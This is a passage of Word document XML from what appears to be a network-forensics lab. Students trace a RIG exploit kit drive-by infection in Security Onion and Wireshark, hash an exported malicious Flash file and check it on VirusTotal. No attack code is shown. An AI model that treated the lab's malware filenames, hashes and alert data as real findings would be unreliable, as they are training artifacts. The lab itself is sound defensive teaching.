                          <a:ext cx="4241800" cy="2859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4.00pt;height:225.15pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId27" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To make room for the Host column right-click the Length column header and uncheck it. This will remove the Length column from the display.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The names of the servers are now clearly visible in the Host column of the packet list.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a Hash for an Exported Malware File.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We know that the user intended to access www.homeimprovement.com, but the site</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> referred the user to other sites. Eventually files were downloaded to the host from a malware site. In this part of the lab, we will access the files that were downloaded and submit a file hash to VirusTotal to verify that a malicious file was downloaded.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Wireshark, go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and save the two text/html files and the application/x-shockwave-flash file to your home directory.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5227320" cy="1301750"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="13" name="Picture 45" descr="screenshot of http objec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5" descr="screenshot of http object list"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId28"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5227320" cy="130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1.60pt;height:102.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId28" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that you have saved the three files to your home folder, test to see if one of the files matches a known hash value for malware at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">virustotal.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Issue a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command to look at the files saved in your home directory. The flash file has the word SeaMonkey near the beginning of the long filename. The filename begins with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">%3fbiw=SeaMonkey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">command with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">grep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to filter out the filename with the pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">seamonkey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ignores the case distinction.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1168"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">analyst@SecOnion:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l | grep -i seamonkey</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rw-r--r-- 1 analyst analyst 1626</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 Jun  9 05:50 %3fbiw=SeaMonkey.105qj67.406x7d8b3&amp;yus=SeaMonkey.78vg115.406g6d1r6&amp;br_fl=2957&amp;oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg&amp;q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRxfs&amp;ct=SeaMonkey&amp;tuif=1166</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate a SHA-1 hash for the SeaMonkey flash file with the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sha1sum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> followed by the filename. Type the first 4 letters %3fb of the filename and then press the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">tab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key to auto fill the rest of the filename. Press enter and sha1sum will compute a 40 digit long fixed length hash value. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Highlight the hash value, right-click, and copy it. The sha1sum is highlighted in the example below. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Remember to use tab completion.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1168"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">analyst@SecOnion:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">sha1su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">m %3fbiw\=SeaMonkey.105qj67.406x7d8b3\&amp;yus\=SeaMonkey.78vg115.406g6d1r6\&amp;br_fl\=2957\&amp;oq\=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg\&amp;q\=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRxfs\&amp;ct\=SeaMonkey\&amp;tuif\=1166</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">97a8033303692f9b7618056e49a24470525f7290</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  %3fbiw=SeaMonkey.105qj67.406x7d8b3&amp;yus=SeaMo nkey.78vg115.406g6d1r6&amp;br_fl=2957&amp;oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg&amp;q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRx fs&amp;ct=SeaMonkey&amp;tuif=1166</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(OPTIONAL) You can also generate a hash value by using NetworkMiner. Navigate to Sguil and right-click the alert ID 5.25 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NetworkMinor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to pivot to NetworkMinor. Select the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tab. In this example, right-click the file with swf extension and select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Calculate MD5 / SHA1 / SHA256 hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Compare the SHA1 hash value with the one from the previous step. The SHA1 hash values should be the same.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open a web browser and go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">virustotal.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tab and enter the hash value to search for a match in the database of known malware hashes. VirusTotal will return a list of the virus detection engines that have a rule that matches this hash. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="3844925" cy="2547620"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="14" name="Picture 13" descr="screenshot of virustotal.com with a file hash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screenshot of virustotal.com with a file hash entered"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId29"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3844925" cy="2547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02.75pt;height:200.60pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId29" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Investigate the Detection and Details tabs. Review the information that is provided on this hash value.</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What did VirusTotal tell you about this file? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing w:after="360" w:before="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close the browser and Wireshark. In Sguil, use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">alert ID 5.37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT_EVENTS RIG EK Landing Sep 12 2016 T2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to pivot to Wireshark and examine the HTTP requests.</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Are there any similarities to the earlier alerts?</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Are the files similar? Do you see any differences?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(OPTIONAL) Create a SHA-1 hash of the SWF file as you did previously.</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Is this the same malware that was downloaded in the previous HTTP session?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Sguil, the last 4 alerts in this series are related, and they also seem to be post-infection.</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Why do they seem to be post-infection? </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is interesting about first alert in the last 4 alerts in the series?</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type of communication is taking place in the second and third alerts in the series and what makes it suspicious? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to virustotal.com and do a URL search for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">.top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">domain used in the attack. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1103"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Question:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the result?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examine the last alert in the series in Wireshark. If it has any objects worth saving, export and save them to your home folder.</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What are the filenames if any?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1101"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examine Exploit Artifacts</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this part, you will examine some of the documents that your exported from Wireshark.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Security Onion, open the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">remodeling-your-kitchen-cabinets.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file using your choice of text editor. This webpage initiated the attack.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1103"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can you find the two places in the webpage that are part of the drive-by attack that started the exploit? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the first is in the &lt;head&gt; area and the second is in the &lt;body&gt; area of the page.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing w:after="240" w:before="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;head profile="http://gmpg.org/xfn/11"&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;title&gt;Remodeling Your Kitchen Cabinets | Home Improvement&lt;/title&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?feed=rss2" title="Home Improvement latest posts" /&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
